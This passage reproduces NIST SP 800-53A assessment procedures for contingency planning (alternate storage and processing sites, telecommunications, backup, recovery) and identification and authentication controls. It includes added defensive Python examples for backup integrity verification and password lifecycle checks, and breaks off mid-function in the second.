Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan reviews and updates; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with contingency plan update responsibilities; organizational personnel with mission-related and operational responsibilities]. (H)


ASSESSMENT PROCEDURE
CP-6 ALTERNATE STORAGE SITE
Control: The organization identifies an alternate storage site and initiates necessary agreements to permit the storage of information system backup information.
Supplemental Guidance: The frequency of information system backups and the transfer rate of backup information to the alternate storage site (if so designated) are consistent with the organization's recovery time objectives and recovery point objectives.
CP-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies an alternate storage site; and
(ii) the organization initiates necessary alternate storage site agreements to permit storage of information system backup information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site agreements; other relevant documents or records]. (M) (H)
CP-6(1) ALTERNATE STORAGE SITE
Control Enhancement:
The organization identifies an alternate storage site that is geographically separated from the primary storage site so as not to be susceptible to the same hazards.
CP-6(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the contingency plan identifies the primary storage site hazards; and
(ii) the alternate storage site is sufficiently separated from the primary storage site so as not to be susceptible to the same hazards identified at the primary site.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site; other relevant documents or records]. (M) (H)
CP-6(2) ALTERNATE STORAGE SITE
Control Enhancement:
The organization configures the alternate storage site to facilitate timely and effective recovery operations.
CP-6(2).1 ASSESSMENT OBJECTIVE:
Determine if the alternate storage site is configured to enable timely and effective recovery operations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site agreements; alternate storage site; other relevant documents or records]. (H)
CP-6(3) ALTERNATE STORAGE SITE
Control Enhancement:
The organization identifies potential accessibility problems to the alternate storage site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions.
CP-6(3).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies potential accessibility problems to the alternate storage site in the event of an area-wide disruption or disaster; and
(ii) the organization defines explicit mitigation actions for potential accessibility problems.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site; other relevant documents or records]. (M) (H)


ASSESSMENT PROCEDURE
CP-7 ALTERNATE PROCESSING SITE
Control: The organization identifies an alternate processing site and initiates necessary agreements to permit the resumption of information system operations for critical mission/business functions within [Assignment: organization-defined time period] when the primary processing capabilities are unavailable.
Supplemental Guidance: Equipment and supplies required to resume operations within the organization-defined time period are either available at the alternate site or contracts are in place to support delivery to the site. Timeframes to resume information system operations are consistent with organization-established recovery time objectives.
CP-7.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies an alternate processing site;
(ii) the organization defines in the security plan, explicitly or by reference, the time period within which processing must be resumed at the alternate processing site; and
(iii) the organization initiates necessary alternate processing site agreements to permit the resumption of information system operations for critical mission/business functions within the organization-defined time period.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site agreements; security plan; other relevant documents or records]. (M) (H)
CP-7(1) ALTERNATE PROCESSING SITE
Control Enhancement:
The organization identifies an alternate processing site that is geographically separated from the primary processing site so as not to be susceptible to the same hazards.
CP-7(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the contingency plan identifies the primary processing site hazards; and
(ii) the alternate processing site is sufficiently separated from the primary processing site so as not to be susceptible to the same hazards identified at the primary site.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site; other relevant documents or records]. (M) (H)
CP-7(2) ALTERNATE PROCESSING SITE
Control Enhancement:
The organization identifies potential accessibility problems to the alternate processing site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions.
CP-7(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the contingency plan identifies potential accessibility problems to the alternate processing site in the event of an area-wide disruption or disaster; and
(ii) the contingency plan defines explicit mitigation actions for potential accessibility problems.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site; other relevant documents or records]. (M) (H)
CP-7(3) ALTERNATE PROCESSING SITE
Control Enhancement:
The organization develops alternate processing site agreements that contain priority-of-service provisions in accordance with the organization's availability requirements.
CP-7(3).1 ASSESSMENT OBJECTIVE:
Determine if alternate processing site agreements contain priority-of-service provisions in accordance with the organization's availability requirements.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site agreements; other relevant documents or records]. (M) (H)
CP-7(4) ALTERNATE PROCESSING SITE
Control Enhancement:
The organization fully configures the alternate processing site so that it is ready to be used as the operational site supporting a minimum required operational capability.
CP-7(4).1 ASSESSMENT OBJECTIVE:
Determine if the alternate processing site is configured to support the minimum required information system operational capability and is ready to use as the operational site.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site; alternate processing site agreements; other relevant documents or records]. (H)
Test: [SELECT FROM: Information system at the alternate processing site]. (H)


ASSESSMENT PROCEDURE
CP-8 TELECOMMUNICATIONS SERVICES
Control: The organization identifies primary and alternate telecommunications services to support the information system and initiates necessary agreements to permit the resumption of system operations for critical mission/business functions within [Assignment: organization-defined time period] when the primary telecommunications capabilities are unavailable.
Supplemental Guidance: In the event that the primary and/or alternate telecommunications services are provided by a common carrier, the organization requests Telecommunications Service Priority (TSP) for all telecommunications services used for national security emergency preparedness (see http://tsp.ncs.gov for a full explanation of the TSP program).
CP-8.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies primary and alternate telecommunications services to support the information system;
(ii) the organization defines in the security plan, explicitly or by reference, the time period within which resumption of information system operations must take place; and
(iii) the organization initiates necessary alternate telecommunications service agreements to permit the resumption of telecommunications services for critical mission/business functions within the organization-defined time period when the primary telecommunications capabilities are unavailable.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; security plan; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H)
CP-8.2 ASSESSMENT OBJECTIVE:
Determine if the organization requests Telecommunications Service Priority (TSP) for all telecommunications services used for national security emergency preparedness when the primary and/or alternate telecommunications services are provided by a common carrier.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H)
CP-8(1) TELECOMMUNICATIONS SERVICES
Control Enhancement:
The organization develops primary and alternate telecommunications service agreements that contain priority-of-service provisions in accordance with the organization's availability requirements.
CP-8(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization develops primary and alternate telecommunications service agreements that contain priority-of-service provisions in accordance with organizational availability requirements.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H)
CP-8(2) TELECOMMUNICATIONS SERVICES
Control Enhancement:
The organization obtains alternate telecommunications services that do not share a single point of failure with primary telecommunications services.
CP-8(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization obtains alternate telecommunications services that do not share a single point of failure with primary telecommunications services.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities; telecommunications service providers]. (M) (H)
CP-8(3) TELECOMMUNICATIONS SERVICES
Control Enhancement:
The organization obtains alternate telecommunications service providers that are sufficiently separated from primary service providers so as not to be susceptible to the same hazards.
CP-8(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization obtains alternate telecommunications service that is sufficiently separated from the primary provider's telecommunications service so as not to be susceptible to the same hazards.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; alternate telecommunications service provider's site; primary telecommunications service provider's site; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities; telecommunications service providers]. (H)
CP-8(4) TELECOMMUNICATIONS SERVICES
Control Enhancement:
The organization requires primary and alternate telecommunications service providers to have adequate contingency plans.
CP-8(4).1 ASSESSMENT OBJECTIVE:
Determine if the organization requires primary and alternate telecommunications service providers to have contingency plans deemed adequate by the organization.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and testing responsibilities; telecommunications service providers]. (H)


ASSESSMENT PROCEDURE
CP-9 INFORMATION SYSTEM BACKUP
Control: The organization conducts backups of user-level and system-level information (including system state information) contained in the information system [Assignment: organization-defined frequency] and protects backup information at the storage location.
Supplemental Guidance: The frequency of information system backups and the transfer rate of backup information to alternate storage sites (if so designated) are consistent with the organization's recovery time objectives and recovery point objectives. While integrity and availability are the primary concerns for system backup information, protecting backup information from unauthorized disclosure is also an important consideration depending on the type of information residing on the backup media and the FIPS 199 impact level. An organizational assessment of risk guides the use of encryption for backup information. The protection of system backup information while in transit is beyond the scope of this control. Related security controls: MP-4, MP-5.
CP-9.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines the frequency of information system backups;
(ii) the organization backs up user-level and system-level information (including system state information) in accordance with the organization-defined frequency; and
(iii) the organization backs up information to alternate storage sites (if so designated) at a frequency and transfer rate consistent with the organization's recovery time objectives and recovery point objectives.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; security plan; backup storage location(s); other relevant documents or records]. (L) (M) (H)
CP-9.2 ASSESSMENT OBJECTIVE:
Determine if the organization protects backup information at the designated storage locations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; security plan; backup storage location(s); other relevant documents or records]. (L) (M) (H)
CP-9(1) INFORMATION SYSTEM BACKUP
Control Enhancement:
The organization tests backup information [Assignment: organization-defined frequency] to verify media reliability and information integrity.
CP-9(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of information system backup testing;
(ii) the organization conducts information system backup testing in accordance with organization-defined frequency; and
(iii) testing results verify backup media reliability and information integrity.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; security plan; information system backup test results; backup storage location(s); other relevant documents or records]. (M) (H)
CP-9(2) INFORMATION SYSTEM BACKUP
Control Enhancement:
The organization selectively uses backup information in the restoration of information system functions as part of contingency plan testing.
CP-9(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization uses selected backup information in the restoration of information system functions as part of contingency plan testing.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; information system backup test results; contingency plan test results; other relevant documents or records]. (H)
CP-9(3) INFORMATION SYSTEM BACKUP
Control Enhancement:
The organization stores backup copies of the operating system and other critical information system software in a separate facility or in a fire-rated container that is not collocated with the operational software.
CP-9(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization stores backup copies of operating system and other critical information system software in a separate facility or in a fire-rated container that is not collocated with the operational software.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; backup storage location(s); other relevant documents or records]. (H)
CP-9(4) INFORMATION SYSTEM BACKUP
Control Enhancement:
The organization protects system backup information from unauthorized modification.
Enhancement Supplemental Guidance: The organization employs appropriate mechanisms (e.g., digital signatures, cryptographic hashes) to protect the integrity of information system backups. Protecting the confidentiality of system backup information is beyond the scope of this control. Related security controls: MP-4, MP-5.
CP-9(4).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs appropriate mechanisms to protect the integrity of information system backup information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; information system design documentation; backup storage location(s); information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system backup responsibilities]. (H)
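The enhancement supplemental guidance above names digital signatures and cryptographic hashes as integrity mechanisms for backups. The following Python is an added illustration written for this page, not code from SP 800-53A or FISMApedia: it digests every file in a backup directory, seals the resulting manifest with an HMAC-SHA256 tag (standing in for a digital signature; the key is assumed to be held separately from the backup media), and reports any missing, modified or unexpected file on verification. The directory contents, file names and key are constructed for the demonstration.

```python
"""Integrity protection for backup files: a keyed manifest of SHA-256 digests.

Added example for CP-9(4); assumptions: an HMAC key stored apart from the
backup (a detached digital signature would serve the same purpose), and
constructed sample files created in a temporary directory.
"""
import hashlib
import hmac
import json
import os
import tempfile


def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 so large backup images do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(backup_dir: str) -> dict:
    """Map each file (path relative to backup_dir) to its SHA-256 digest."""
    entries = {}
    for root, _dirs, files in os.walk(backup_dir):
        for name in sorted(files):
            full = os.path.join(root, name)
            entries[os.path.relpath(full, backup_dir)] = sha256_file(full)
    return entries


def _canonical(entries: dict) -> bytes:
    # Deterministic serialisation: the same manifest always yields the same bytes to tag.
    return json.dumps(entries, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(entries: dict, key: bytes) -> bytes:
    """Attach an HMAC-SHA256 tag so the manifest itself cannot be silently rewritten.

    A bare hash list stored next to the backup gives no protection: whoever can
    alter the backup can recompute the hashes. The key (or a signing key) must
    live outside the backup store.
    """
    tag = hmac.new(key, _canonical(entries), hashlib.sha256).hexdigest()
    return json.dumps({"manifest": entries, "hmac_sha256": tag}, sort_keys=True).encode()


def verify_backup(backup_dir: str, signed: bytes, key: bytes) -> list:
    """Return a list of findings; an empty list means the backup matches the sealed manifest."""
    doc = json.loads(signed)
    expected = hmac.new(key, _canonical(doc["manifest"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac_sha256"]):
        # Manifest was altered or the wrong key was supplied: nothing below can be trusted.
        return ["manifest signature invalid"]
    problems = []
    current = build_manifest(backup_dir)
    for rel, digest in doc["manifest"].items():
        if rel not in current:
            problems.append(f"missing: {rel}")
        elif current[rel] != digest:
            problems.append(f"modified: {rel}")
    for rel in current:
        if rel not in doc["manifest"]:
            problems.append(f"unexpected: {rel}")
    return problems


def demo() -> tuple:
    """Constructed scenario: seal a two-file backup, then tamper with one file."""
    key = b"constructed-demo-key-keep-offline"  # constructed; not a real key
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "os-image.bin"), "wb") as f:
            f.write(b"constructed operating system image")
        with open(os.path.join(d, "config.tar"), "wb") as f:
            f.write(b"constructed configuration archive")
        signed = sign_manifest(build_manifest(d), key)
        clean = verify_backup(d, signed, key)
        with open(os.path.join(d, "config.tar"), "ab") as f:
            f.write(b"tampered")  # simulated unauthorized modification
        tampered = verify_backup(d, signed, key)
        wrong_key = verify_backup(d, signed, b"other-key")
    return clean, tampered, wrong_key


if __name__ == "__main__":
    print(demo())
```

An assessor examining "backup storage location(s)" for this enhancement would look for exactly this separation: the digest list or signature verified against something the backup operator cannot rewrite, and a verification step that is actually run before a restore.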


ASSESSMENT PROCEDURE
CP-10 INFORMATION SYSTEM RECOVERY AND RECONSTITUTION
Control: The organization employs mechanisms with supporting procedures to allow the information system to be recovered and reconstituted to a known secure state after a disruption or failure.
Supplemental Guidance: Information system recovery and reconstitution to a known secure state means that all system parameters (either default or organization-established) are set to secure values, security-critical patches are reinstalled, security-related configuration settings are reestablished, system documentation and operating procedures are available, application and system software is reinstalled and configured with secure settings, information from the most recent, known secure backups is loaded, and the system is fully tested.
CP-10.1 ASSESSMENT OBJECTIVE:
Determine if the organization provides and applies mechanisms and procedures for recovery and reconstitution of the information system to a known secure state after disruption or failure.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system recovery and reconstitution; information system configuration settings and associated documentation; information system design documentation; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing information system recovery and reconstitution operations]. (M) (H)
CP-10(1) INFORMATION SYSTEM RECOVERY AND RECONSTITUTION
Control Enhancement:
The organization includes a full recovery and reconstitution of the information system as part of contingency plan testing.
CP-10(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization includes a full recovery and reconstitution of the information system as part of contingency plan testing.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system recovery and reconstitution; contingency plan test procedures; contingency plan test results; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system recovery and reconstitution responsibilities; organizational personnel with contingency testing responsibilities]. (H)


FAMILY:

Identification and Authentication


ASSESSMENT PROCEDURE
IA-1 IDENTIFICATION AND AUTHENTICATION POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, identification and authentication policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the identification and authentication policy and associated identification and authentication controls.
Supplemental Guidance: The identification and authentication policy and procedures are consistent with: (i) FIPS 201 and Special Publications 800-73, 800-76, and 800-78; and (ii) other applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The identification and authentication policy can be included as part of the general information security policy for the organization. Identification and authentication procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. NIST Special Publication 800-63 provides guidance on remote electronic authentication.
IA-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents identification and authentication policy and procedures;
(ii) the organization disseminates identification and authentication policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review identification and authentication policy and procedures; and
(iv) the organization updates identification and authentication policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with identification and authentication responsibilities]. (H)
IA-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the identification and authentication policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the identification and authentication policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the identification and authentication procedures address all areas identified in the identification and authentication policy and address achieving policy-compliant implementations of all associated identification and authentication controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with identification and authentication responsibilities]. (H)


ASSESSMENT PROCEDURE
IA-2 USER IDENTIFICATION AND AUTHENTICATION
Control: The information system uniquely identifies and authenticates users (or processes acting on behalf of users).
Supplemental Guidance: Users are uniquely identified and authenticated for all accesses other than those accesses explicitly identified and documented by the organization in accordance with security control AC-14. Authentication of user identities is accomplished through the use of passwords, tokens, biometrics, or in the case of multifactor authentication, some combination thereof. NIST Special Publication 800-63 provides guidance on remote electronic authentication including strength of authentication mechanisms. For purposes of this control, the guidance provided in Special Publication 800-63 is applied to both local and remote access to information systems. Remote access is any access to an organizational information system by a user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet). Local access is any access to an organizational information system by a user (or an information system) communicating through an internal organization-controlled network (e.g., local area network) or directly to a device without the use of a network. Unless a more stringent control enhancement is specified, authentication for both local and remote information system access is NIST Special Publication 800-63 level 1 compliant. FIPS 201 and Special Publications 800-73, 800-76, and 800-78 specify a personal identity verification (PIV) credential for use in the unique identification and authentication of federal employees and contractors. In addition to identifying and authenticating users at the information system level (i.e., at system logon), identification and authentication mechanisms are employed at the application level, when necessary, to provide increased information security for the organization.
In accordance with OMB policy and E-Authentication E-Government initiative, authentication of public users accessing federal information systems may also be required to protect nonpublic or privacy-related information. The e-authentication risk assessment conducted in accordance with OMB Memorandum 04-04 is used in determining the NIST Special Publication 800-63 compliance requirements for such accesses with regard to the IA-2 control and its enhancements. Scalability, practicality, and security issues are simultaneously considered in balancing the need to ensure ease of use for public access to such information and information systems with the need to protect organizational operations, organizational assets, and individuals. Related security controls: AC-14, AC-17.
IA-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the information system uniquely identifies and authenticates users (or processes acting on behalf of users); and
(ii) authentication levels for users (or processes acting on behalf of users) are consistent with NIST Special Publication 800-63 and e-authentication risk assessment results.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; information system design documentation; e-authentication risk assessment results; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing identification and authentication capability for the information system]. (M) (H)
IA-2(1) USER IDENTIFICATION AND AUTHENTICATION
Control Enhancement:
The information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 [Selection: organization-defined level 3, level 3 using a hardware authentication device, or level 4] compliant.
IA-2(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the NIST Special Publication 800-63 authentication levels for the information system; and
(ii) the information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 compliant in accordance with the organizational selection of level 3, level 3 using a hardware authentication device, or level 4.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; security plan; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M)
IA-2(2) USER IDENTIFICATION AND AUTHENTICATION
Control Enhancement:
The information system employs multifactor authentication for local system access that is NIST Special Publication 800-63 [Selection: organization-defined level 3 or level 4] compliant.
IA-2(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the NIST Special Publication 800-63 authentication levels for the information system; and
(ii) the information system employs multifactor authentication for local system access that is NIST Special Publication 800-63 compliant in accordance with the organizational selection of level 3 or level 4.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; security plan; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
IA-2(3) USER IDENTIFICATION AND AUTHENTICATION
Control Enhancement:
The information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 level 4 compliant.
IA-2(3).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines the NIST Special Publication 800-63 authentication levels for the information system; and
(ii) the information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 level 4 compliant.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
IA-3 DEVICE IDENTIFICATION AND AUTHENTICATION
Control: The information system identifies and authenticates specific devices before establishing a connection.
Supplemental Guidance: The information system typically uses either shared known information (e.g., Media Access Control (MAC) or Transmission Control Protocol/Internet Protocol (TCP/IP) addresses) or an organizational authentication solution (e.g., IEEE 802.1x and Extensible Authentication Protocol (EAP) or a Radius server with EAP-Transport Layer Security (TLS) authentication) to identify and authenticate devices on local and/or wide area networks. The required strength of the device authentication mechanism is determined by the FIPS 199 security categorization of the information system with higher impact levels requiring stronger authentication.
IA-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines the devices for which identification and authentication is required before establishing connections to the information system;
(ii) the information system uniquely identifies and authenticates the devices defined by the organization before establishing connections to the information system; and
(iii) the information system employs device authentication mechanisms with strength of mechanism determined by the FIPS 199 security categorization of the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; procedures addressing device identification and authentication; information system design documentation; device connection reports; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing device identification and authentication]. (H)


ASSESSMENT PROCEDURE
IA-4 IDENTIFIER MANAGEMENT
Control: The organization manages user identifiers by: (i) uniquely identifying each user; (ii) verifying the identity of each user; (iii) receiving authorization to issue a user identifier from an appropriate organization official; (iv) issuing the user identifier to the intended party; (v) disabling the user identifier after [Assignment: organization-defined time period] of inactivity; and (vi) archiving user identifiers.
Supplemental Guidance: Identifier management is not applicable to shared information system accounts (e.g., guest and anonymous accounts). FIPS 201 and Special Publications 800-73, 800-76, and 800-78 specify a personal identity verification (PIV) credential for use in the unique identification and authentication of federal employees and contractors.
IA-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization manages user identifiers by uniquely identifying each user;
(ii) the organization manages user identifiers by verifying the identity of each user;
(iii) the organization manages user identifiers by receiving authorization to issue a user identifier from an appropriate organization official;
(iv) the organization manages user identifiers by issuing the identifier to the intended party;
(v) the organization defines in the security plan, explicitly or by reference, the time period of inactivity after which a user identifier is to be disabled;
(vi) the organization manages user identifiers by disabling the identifier after the organization-defined time period of inactivity; and
(vii) the organization manages user identifiers by archiving identifiers.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; procedures addressing identifier management; security plan; information system design documentation; information system configuration settings and associated documentation; list of information system accounts; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
IA-5 AUTHENTICATOR MANAGEMENT
Control: The organization manages information system authenticators by: (i) defining initial authenticator content; (ii) establishing administrative procedures for initial authenticator distribution, for lost/compromised or damaged authenticators, and for revoking authenticators; (iii) changing default authenticators upon information system installation; and (iv) changing/refreshing authenticators periodically.
Supplemental Guidance: Information system authenticators include, for example, tokens, PKI certificates, biometrics, passwords, and key cards. Users take reasonable measures to safeguard authenticators including maintaining possession of their individual authenticators, not loaning or sharing authenticators with others, and reporting lost or compromised authenticators immediately. For password-based authentication, the information system: (i) protects passwords from unauthorized disclosure and modification when stored and transmitted; (ii) prohibits passwords from being displayed when entered; (iii) enforces password minimum and maximum lifetime restrictions; and (iv) prohibits password reuse for a specified number of generations. For PKI-based authentication, the information system: (i) validates certificates by constructing a certification path to an accepted trust anchor; (ii) establishes user control of the corresponding private key; and (iii) maps the authenticated identity to the user account. In accordance with OMB policy and related E-authentication initiatives, authentication of public users accessing federal information systems (and associated authenticator management) may also be required to protect nonpublic or privacy-related information. FIPS 201 and Special Publications 800-73, 800-76, and 800-78 specify a personal identity verification (PIV) credential for use in the unique identification and authentication of federal employees and contractors. NIST Special Publication 800-63 provides guidance on remote electronic authentication.
IA-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization manages information system authenticators by defining initial authenticator content;
(ii) the organization manages information system authenticators by establishing administrative procedures for initial authenticator distribution, for lost/compromised or damaged authenticators, and for revoking authenticators;
(iii) the organization manages information system authenticators by changing default authenticators upon information system installation; and
(iv) the organization manages information system authenticators by changing/refreshing authenticators periodically.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; procedures addressing authenticator management; information system design documentation; information system configuration settings and associated documentation; list of information system accounts; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for determining initial authenticator content]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing authenticator management functions]. (M) (H)
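The IA-5 supplemental guidance lists what a system does for password-based authentication: protect stored passwords, enforce minimum and maximum lifetimes, and refuse reuse across a number of generations; the control itself adds replacing default authenticators at installation. The Python below is an added example for this page, not code from SP 800-53A or any product: a small password-authenticator record that enforces those rules together, so that a "Test" of automated authenticator management functions has something concrete to exercise. The lifetime values, generation count, PBKDF2 work factor and sample passwords are constructed assumptions standing in for organization-defined values.

```python
"""Password authenticator lifecycle checks drawn from IA-5.

Added example; assumptions (not from SP 800-53): the policy constants below,
PBKDF2-HMAC-SHA256 as the storage hash, and the constructed passwords in demo().
"""
import hashlib
import hmac
import os
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Organization-defined policy values (constructed for this demonstration).
MIN_LIFETIME = timedelta(days=1)      # earliest a user may change a password again
MAX_LIFETIME = timedelta(days=60)     # after this the password is expired
REUSE_GENERATIONS = 5                 # new password may not match any of the last 5
PBKDF2_ITERATIONS = 200_000           # work factor chosen for this demo


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted, iterated hash: what is stored instead of the password (IA-5 guidance, item i)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def matches(password: str, salt: bytes, digest: bytes) -> bool:
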